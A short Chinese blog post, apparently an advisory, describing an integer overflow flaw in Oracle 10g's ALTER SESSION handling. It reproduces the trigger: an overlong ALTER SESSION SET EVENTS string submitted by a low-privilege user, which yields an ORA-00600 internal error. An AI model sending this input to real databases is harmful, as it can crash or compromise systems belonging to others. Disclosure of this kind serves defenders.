Oracle 10g更改会话整数溢出漏洞
版权声明:原创作品,如需转载,请与作者联系。否则将追究法律责任。 |
Oracle在处理更改会话操作时存在整数溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
仅拥有SELECT权限的用户可以通过提交超长的alter session请求来触发这个漏洞,导致在数据库中执行任意命令。 测试方法:
以仅有CREATE SESSION权限用户的身份连接到数据库。
SQL> alter session set events '10046 trace name context forever, level 16'; Session altered. SQL> alter session set events '10046100461004610046100461004610046100461004610046100461004610046100461 004610046100461004610046100461004610046100461004610046100461004610046100 461004610046100461004610046100461004610046100461004610046100461004610046 100461004610046100461004610046100461004610046100461004610046100461004610 046100461004610046100461004610046100461004610046100461004610046100461004 610046100461004610046100461004610046100461004610046100461004610046100461 004610046100461004610046100461004610046100461004610046100461004610046100 461004610046100461004610046100461004610046100461004610046100461004610046 100461004610046100461004610046100461004610046100461004610046100461004610 046100461004610046100461004610046100461004610046100461004610046100461004 610046100461004610046100461004610046100461004610046100461004610046100461 004610046100461004610046100461004610046100461004610046100461004610046100 461004610046100461004610046100461004 610046100461004610046100461004610046100461004610046100461004610046100461 00461004610046trace name context forever, level 16'; ERROR: ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [], [] 目前厂商还没有提供补丁或者升级程序 本文出自 “Wyulnnhtg's Blog” 博客,转载请与作者联系! 本文出自 51CTO.COM技术博客 |
wyulnnhtg
博客统计信息
热门文章
最新评论
友情链接
